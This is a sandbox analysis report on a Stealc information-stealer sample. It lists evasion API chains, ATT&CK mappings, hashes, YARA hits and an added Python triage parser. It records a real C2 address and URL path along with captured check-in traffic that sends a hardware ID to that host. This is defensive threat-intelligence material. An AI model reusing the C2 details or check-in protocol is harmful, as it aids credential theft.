                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00097A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00097A30
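The Code function lines in this report (the FindFirstFileA/CopyFileA/DeleteFileA/FindNextFileA loops listed under the evasion findings, the long GetProcAddress chain, the fs:[00000030h] PEB read, the VirtualProtect call, the Toolhelp32 process walk, and the keyboard-layout, system-time, user-name and time-zone queries in this section) are easier to triage once each chain carries a behaviour label. The following is an added Python example, written for this page and not Joe Sandbox or Stealc code: it parses those lines (ten of them copied verbatim as constructed input), strips the function id that the report glues onto the end of each chain, drops call arguments, decorated C++ symbols and assembly fragments, and applies a small rule table. The rules and their label names are this example's own reading of the chains, not report signatures, and the GetProcAddress threshold is an arbitrary choice.

```python
"""Label 'Code function: <id> <API chain>' findings by the behaviour the chain implies.

Added example for this report, not Joe Sandbox code. The sample lines are copied
verbatim from the findings; the rule table and its labels are this example's own
reading of the chains (an assumption), not Joe Sandbox signatures.
"""
import re
from collections import Counter
from dataclasses import dataclass

# Constructed input: ten Code function lines copied from the report.
CODE_FUNCTION_LINES = [
    r"Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000938B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_000938B0",
    r"Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0008DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0008DA80",
    r"Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00081160 GetSystemInfo,ExitProcess,0_2_00081160",
    r"Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000845C0 VirtualProtect ?,00000004,00000100,000000000_2_000845C0",
    r"Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00099860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00099860",
    r"Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00099750 mov eax, dword ptr fs:[00000030h]0_2_00099750",
    r"Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00099600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00099600",
    r"Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00097B90",
    r"Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00096920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00096920",
    r"Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00097A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00097A30",
]

_CODE_FN = re.compile(r"Code function: (.*)$")
_LEAD_ID = re.compile(r"(\d+_\d+_[0-9A-Fa-f]+)\s+")   # "<pid>_<run>_<address>" before the chain
_TAIL_ID = re.compile(r"(\d+_\d+_[0-9A-Fa-f]+)$")     # the same id glued onto the chain's end
_ASM = re.compile(r"\b(?:dword|word|byte) ptr\b|fs:\[")  # line is a disassembly fragment
_IDENT = re.compile(r"[A-Za-z_]\w*")


@dataclass
class CodeFunction:
    fn_id: str
    body: str      # the raw chain with the glued trailing id removed
    apis: list     # imported/CRT function names in call order


def extract_apis(body: str) -> list:
    """Comma-separated chain -> identifiers. Arguments ('?', hex), decorated C++
    symbols and assembly fragments are dropped."""
    if _ASM.search(body):
        return []
    apis = []
    for tok in body.split(","):
        head = tok.strip().split(" ")[0]
        if _IDENT.fullmatch(head):
            apis.append(head)
    return apis


def parse_line(line: str):
    """Return a CodeFunction for a 'Code function' line, or None for any other finding."""
    m = _CODE_FN.search(line)
    if not m:
        return None
    rest = m.group(1).strip()
    lead = _LEAD_ID.match(rest)
    if lead:
        fn_id, body = lead.group(1), rest[lead.end():]
        if body.endswith(fn_id):       # the id is repeated at the end, glued to the chain
            body = body[:-len(fn_id)]
    else:                               # a few lines carry the id only at the end
        tail = _TAIL_ID.search(rest)
        if not tail:
            return None
        fn_id, body = tail.group(1), rest[:tail.start()]
    return CodeFunction(fn_id, body.strip(" ,"), extract_apis(body))


# (label, predicate over (api list, raw body)); labels are this example's own names.
RULES = [
    ("file-harvest loop",
     lambda a, b: {"FindFirstFileA", "FindNextFileA", "CopyFileA"} <= set(a)),
    ("directory walk",
     lambda a, b: {"FindFirstFileA", "FindNextFileA"} <= set(a) and "CopyFileA" not in a),
    ("process enumeration",
     lambda a, b: {"CreateToolhelp32Snapshot", "Process32First", "Process32Next"} <= set(a)),
    ("runtime API resolution", lambda a, b: a.count("GetProcAddress") >= 8),   # threshold is arbitrary
    ("PEB access", lambda a, b: "fs:[00000030h]" in b),
    ("page-protection change", lambda a, b: "VirtualProtect" in a),
    ("keyboard-layout/locale check",
     lambda a, b: {"GetKeyboardLayoutList", "GetLocaleInfoA"} <= set(a)),
    ("time-gated exit",
     lambda a, b: {"GetSystemTime", "SystemTimeToFileTime", "ExitProcess"} <= set(a)),
    ("host profiling",
     lambda a, b: bool(set(a) & {"GetUserNameA", "GetTimeZoneInformation", "GetSystemInfo"})),
]


def classify(fn: CodeFunction) -> list:
    return [label for label, rule in RULES if rule(fn.apis, fn.body)]


def parse_report(lines) -> list:
    return [f for f in map(parse_line, lines) if f is not None]


def behaviour_counts(lines) -> Counter:
    """How many functions exhibit each behaviour; ties the report back to a triage summary."""
    counts = Counter()
    for fn in parse_report(lines):
        counts.update(classify(fn))
    return counts


if __name__ == "__main__":
    for fn in parse_report(CODE_FUNCTION_LINES):
        print(fn.fn_id, classify(fn), fn.apis[:6])
    print(behaviour_counts(CODE_FUNCTION_LINES))
```

The rule table is the part meant to be extended: the same parse step feeds any further chain patterns a triage team cares about, and the id-stripping logic is what makes the VirtualProtect line (where the argument `00000000` is glued to the id) and the PEB line (which is disassembly, not an API list) come out correctly.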

                Stealing of Sensitive Information

                Source: Yara matchFile source: 0.2.file.exe.80000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2191696889.0000000000D38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2145893741.0000000004A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6492, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                Source: Yara matchFile source: 0.2.file.exe.80000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2191696889.0000000000D38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2145893741.0000000004A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6492, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP
                MITRE ATT&CK matrix, as rendered in the report. A number in front of a technique is the count the matrix cell shows for it; unnumbered techniques are the matrix's fixed layout, not observations for this sample.

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
                Execution: 2 Command and Scripting Interpreter; 11 Native API; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
                Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                Defense Evasion: 1 Masquerading; 33 Virtualization/Sandbox Evasion; 11 Disable or Modify Tools; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
                Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
                Discovery: 2 System Time Discovery; 641 Security Software Discovery; 33 Virtualization/Sandbox Evasion; 13 Process Discovery; 1 Account Discovery; 1 System Owner/User Discovery; 1 File and Directory Discovery; 324 System Information Discovery
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
                Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
                Command and Control: 2 Encrypted Channel; 2 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
                Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Source | Detection | Scanner | Label | Link
                file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
                file.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                No contacted domains info
                Name | Malicious | Antivirus Detection | Reputation
                http://185.215.113.206/ | true | | unknown
                http://185.215.113.206/e2b1563c6670f193.php | true | | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                http://185.215.113.206/R | file.exe, 00000000.00000002.2191696889.0000000000D78000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                http://185.215.113.206/e2b1563c6670f193.php/ | file.exe, 00000000.00000002.2191696889.0000000000D78000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                http://185.215.113.206/e2b1563c6670f193.phpLZX | file.exe, 00000000.00000002.2191696889.0000000000D78000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                http://185.215.113.206/e2b1563c6670f193.php4Z | file.exe, 00000000.00000002.2191696889.0000000000D78000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                http://185.215.113.206 | file.exe, 00000000.00000002.2191696889.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.206/ws | file.exe, 00000000.00000002.2191696889.0000000000D78000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                http://185.215.113.206/g | file.exe, 00000000.00000002.2191696889.0000000000D64000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs
                IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                185.215.113.206 | unknown | Portugal | | 206894 | WHOLESALECONNECTIONSNL | true
                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1543095
                                  Start date and time:2024-10-27 08:51:09 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 5m 2s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of new started processes analysed:5
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:file.exe
                                  Detection:MAL
                                  Classification:mal100.troj.evad.winEXE@1/0@0/1
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:
                                  • Successful, ratio: 80%
                                  • Number of executed functions: 19
                                  • Number of non-executed functions: 88
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  No simulations
                Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                185.215.113.206 | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.206/e2b1563c6670f193.php
                | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206/e2b1563c6670f193.php
                | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.206/e2b1563c6670f193.php
                | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206/
                | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.206/e2b1563c6670f193.php
                | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206/e2b1563c6670f193.php
                | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.206/e2b1563c6670f193.php
                | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206/
                | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206/
                | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206/e2b1563c6670f193.php
                                  No context
                Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.206
                | file.exe | Get hash | malicious | LummaC | Browse | 185.215.113.16
                | file.exe | Get hash | malicious | LummaC | Browse | 185.215.113.16
                | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206
                | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.206
                | file.exe | Get hash | malicious | LummaC | Browse | 185.215.113.16
                | file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, RedLine, Stealc, Vidar | Browse | 185.215.113.17
                | S92Ayq3U9A.exe | Get hash | malicious | LummaC | Browse | 185.215.113.16
                | file.exe | Get hash | malicious | LummaC | Browse | 185.215.113.16
                | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206
                                  No context
                                  No context
                                  No created / dropped files found
                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):7.94776407612308
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:file.exe
                                  File size:1'828'352 bytes
                                  MD5:e1d69985ce8b4cb34d5ceca422eb15c3
                                  SHA1:9382606ea46d759e13140c55d36ec6078c2186b1
                                  SHA256:0409e35a5fd1f875e55f4f615cb7e31376177a9e2f06e41209576346e9a4d4f7
                                  SHA512:22447878f06d5a0a83cd8684ad054aceae932493d7aba289c3e4be708ff4fec615265ef6e3d91ecaff80f24765708584f24ad4b4e51c3b151ace24b33418cb02
                                  SSDEEP:49152:2Y/wmHJY7yn8yTvzM4XXNrT5+3MRAfcQnwu:2YJJYen8szRXXlT5+3jcQnD
                                  TLSH:698533937C1203F6C16F71F0A67B0B629B52751D1192756A004661BC0FAB3A679C1EBF
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...9$.g...........
                                  Icon Hash:00928e8e8686b000
                                  Entrypoint:0xa94000
                                  Entrypoint Section:.taggant
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x671C2439 [Fri Oct 25 23:05:29 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:1
                                  File Version Major:5
                                  File Version Minor:1
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:1
                                  Import Hash:2eabe9054cad5152567f0699947a2c5b
                                  Instruction
                                  jmp 00007F25ED3E015Ah
                                  pinsrw mm3, word ptr [ebx], 00h
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  jmp 00007F25ED3E2155h
                                  add byte ptr [esi], al
                                  or al, byte ptr [eax]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], dh
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [edx], cl
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [esi], al
                                  add byte ptr [eax], 00000000h
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  adc byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  push es
                                  or al, byte ptr [eax]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], dh
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add bh, bh
                                  Programming Language:
                                  • [C++] VS2010 build 30319
                                  • [ASM] VS2010 build 30319
                                  • [ C ] VS2010 build 30319
                                  • [ C ] VS2008 SP1 build 30729
                                  • [IMP] VS2008 SP1 build 30729
                                  • [LNK] VS2010 build 30319
                Name | Virtual Address | Virtual Size | Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                (unnamed) | 0x1000 | 0x25b000 | 0x22800 | ece180ad5498df8aec20378f09f321f5 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                (unnamed) | 0x25e000 | 0x29c000 | 0x200 | c7b3ccdb5b3ba5dac8ed84fa9b86dafb | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                cjjmoofv | 0x4fa000 | 0x199000 | 0x198400 | c70a368a7ae6e6181d46ca7b66e71bba | False | 0.9947171138242499 | data | 7.953081730798391 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                pwxczyzg | 0x693000 | 0x1000 | 0x400 | a3f7a67d081755a97a74c9b15ba624ca | False | 0.7255859375 | data | 5.719279495268627 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .taggant | 0x694000 | 0x3000 | 0x2200 | e380c32798e8dca200e7aee39b3ff43c | False | 0.07433363970588236 | DOS executable (COM) | 0.9606074680890394 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                DLL | Import
                kernel32.dll | lstrcpy
                Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                2024-10-27T08:52:06.786046+0100 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.6 | 49710 | 185.215.113.206 | 80 | TCP
                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                Oct 27, 2024 08:52:05.558475971 CET | 49710 | 80 | 192.168.2.6 | 185.215.113.206
                Oct 27, 2024 08:52:05.564167023 CET | 80 | 49710 | 185.215.113.206 | 192.168.2.6
                Oct 27, 2024 08:52:05.564393044 CET | 49710 | 80 | 192.168.2.6 | 185.215.113.206
                Oct 27, 2024 08:52:05.565020084 CET | 49710 | 80 | 192.168.2.6 | 185.215.113.206
                Oct 27, 2024 08:52:05.570303917 CET | 80 | 49710 | 185.215.113.206 | 192.168.2.6
                Oct 27, 2024 08:52:06.490541935 CET | 80 | 49710 | 185.215.113.206 | 192.168.2.6
                Oct 27, 2024 08:52:06.490742922 CET | 49710 | 80 | 192.168.2.6 | 185.215.113.206
                Oct 27, 2024 08:52:06.494079113 CET | 49710 | 80 | 192.168.2.6 | 185.215.113.206
                Oct 27, 2024 08:52:06.499478102 CET | 80 | 49710 | 185.215.113.206 | 192.168.2.6
                Oct 27, 2024 08:52:06.785945892 CET | 80 | 49710 | 185.215.113.206 | 192.168.2.6
                Oct 27, 2024 08:52:06.786046028 CET | 49710 | 80 | 192.168.2.6 | 185.215.113.206
                Oct 27, 2024 08:52:09.066016912 CET | 49710 | 80 | 192.168.2.6 | 185.215.113.206
                                  • 185.215.113.206
                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                0 | 192.168.2.6 | 49710 | 185.215.113.206 | 80 | 6492 | C:\Users\user\Desktop\file.exe
                Timestamp | Bytes transferred | Direction | Data
                Oct 27, 2024 08:52:05.565020084 CET | 90 | OUT | GET / HTTP/1.1
                Host: 185.215.113.206
                Connection: Keep-Alive
                Cache-Control: no-cache
                Oct 27, 2024 08:52:06.490541935 CET | 203 | IN | HTTP/1.1 200 OK
                Date: Sun, 27 Oct 2024 07:52:06 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Content-Length: 0
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: text/html; charset=UTF-8
                Oct 27, 2024 08:52:06.494079113 CET | 412 | OUT | POST /e2b1563c6670f193.php HTTP/1.1
                Content-Type: multipart/form-data; boundary=----EGCBAFCFIJJJECBGIIJK
                Host: 185.215.113.206
                Content-Length: 210
                Connection: Keep-Alive
                Cache-Control: no-cache
                Data Raw: 2d 2d 2d 2d 2d 2d 45 47 43 42 41 46 43 46 49 4a 4a 4a 45 43 42 47 49 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 44 30 33 39 45 34 35 34 36 41 36 38 39 34 36 31 37 39 39 38 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 41 46 43 46 49 4a 4a 4a 45 43 42 47 49 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 70 75 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 41 46 43 46 49 4a 4a 4a 45 43 42 47 49 49 4a 4b 2d 2d 0d 0a
                Data Ascii: ------EGCBAFCFIJJJECBGIIJKContent-Disposition: form-data; name="hwid"6D039E4546A6894617998------EGCBAFCFIJJJECBGIIJKContent-Disposition: form-data; name="build"puma------EGCBAFCFIJJJECBGIIJK--
                Oct 27, 2024 08:52:06.785945892 CET | 210 | IN | HTTP/1.1 200 OK
                Date: Sun, 27 Oct 2024 07:52:06 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Content-Length: 8
                Keep-Alive: timeout=5, max=99
                Connection: Keep-Alive
                Content-Type: text/html; charset=UTF-8
                Data Raw: 59 6d 78 76 59 32 73 3d
                Data Ascii: YmxvY2s=



                                  Target ID:0
                                  Start time:03:52:01
                                  Start date:27/10/2024
                                  Path:C:\Users\user\Desktop\file.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                  Imagebase:0x80000
                                  File size:1'828'352 bytes
                                  MD5 hash:E1D69985CE8B4CB34D5CECA422EB15C3
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2191696889.0000000000D38000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2145893741.0000000004A40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:low
                                  Has exited:true


                                    Execution Graph

                                    Execution Coverage:7.9%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:9.7%
                                    Total number of Nodes:2000
                                    Total number of Limit Nodes:24
                                    execution_graph 13385 969f0 13430 82260 13385->13430 13409 96a64 13410 9a9b0 4 API calls 13409->13410 13411 96a6b 13410->13411 13412 9a9b0 4 API calls 13411->13412 13413 96a72 13412->13413 13414 9a9b0 4 API calls 13413->13414 13415 96a79 13414->13415 13416 9a9b0 4 API calls 13415->13416 13417 96a80 13416->13417 13582 9a8a0 13417->13582 13419 96b0c 13586 96920 GetSystemTime 13419->13586 13421 96a89 13421->13419 13423 96ac2 OpenEventA 13421->13423 13425 96ad9 13423->13425 13426 96af5 CloseHandle Sleep 13423->13426 13429 96ae1 CreateEventA 13425->13429 13427 96b0a 13426->13427 13427->13421 13429->13419 13783 845c0 13430->13783 13432 82274 13433 845c0 2 API calls 13432->13433 13434 8228d 13433->13434 13435 845c0 2 API calls 13434->13435 13436 822a6 13435->13436 13437 845c0 2 API calls 13436->13437 13438 822bf 13437->13438 13439 845c0 2 API calls 13438->13439 13440 822d8 13439->13440 13441 845c0 2 API calls 13440->13441 13442 822f1 13441->13442 13443 845c0 2 API calls 13442->13443 13444 8230a 13443->13444 13445 845c0 2 API calls 13444->13445 13446 82323 13445->13446 13447 845c0 2 API calls 13446->13447 13448 8233c 13447->13448 13449 845c0 2 API calls 13448->13449 13450 82355 13449->13450 13451 845c0 2 API calls 13450->13451 13452 8236e 13451->13452 13453 845c0 2 API calls 13452->13453 13454 82387 13453->13454 13455 845c0 2 API calls 13454->13455 13456 823a0 13455->13456 13457 845c0 2 API calls 13456->13457 13458 823b9 13457->13458 